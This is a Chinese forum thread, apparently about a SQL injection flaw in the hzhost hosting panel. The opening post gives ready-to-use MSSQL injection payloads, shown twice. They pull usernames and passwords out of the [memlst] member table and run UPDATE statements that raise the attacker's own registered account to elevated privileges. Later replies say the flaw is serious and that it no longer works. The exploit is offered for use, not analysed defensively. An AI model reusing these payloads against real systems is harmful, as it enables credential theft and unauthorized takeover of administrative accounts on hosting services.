123\' and (select top 1 isnull(cast([u_nme] as nvarchar(4000)),char(32))+char(94)+isnull(cast([U_pss] as nvarchar(4000)),char(32)) from (select top 2u_nme,U_pss from [hzhost]..[memlst] where 1=1 order by [u_nme]) t order by [u_nme] desc )>0-- and \'1\'=\'1
第二种方法:分别提交以下的注入语句:
123\' UPDATE [memlst] SET u_sys=6 WHERE u_nme=\'你注册的用户名\'--
123\' UPDATE [memlst] SET u_pwr=2 WHERE u_nme=\'你注册的用户名\'--
123\' and (select top 1 isnull(cast([u_nme] as nvarchar(4000)),char(32))+char(94)+isnull(cast([U_pss] as nvarchar(4000)),char(32)) from (select top 2u_nme,U_pss from [hzhost]..[memlst] where 1=1 order by [u_nme]) t order by [u_nme] desc )>0-- and \'1\'=\'1
第二种方法:分别提交以下的注入语句:
123\' UPDATE [memlst] SET u_sys=6 WHERE u_nme=\'你注册的用户名\'--
123\' UPDATE [memlst] SET u_pwr=2 WHERE u_nme=\'你注册的用户名\'--
这个漏洞挺大的、
opeat你帮着发了,那我就``不管了
使用道具 举报
使用道具 举报
已经不存在这个漏洞了..
使用道具 举报
使用道具 举报
使用道具 举报
使用道具 举报
使用道具 举报
使用道具 举报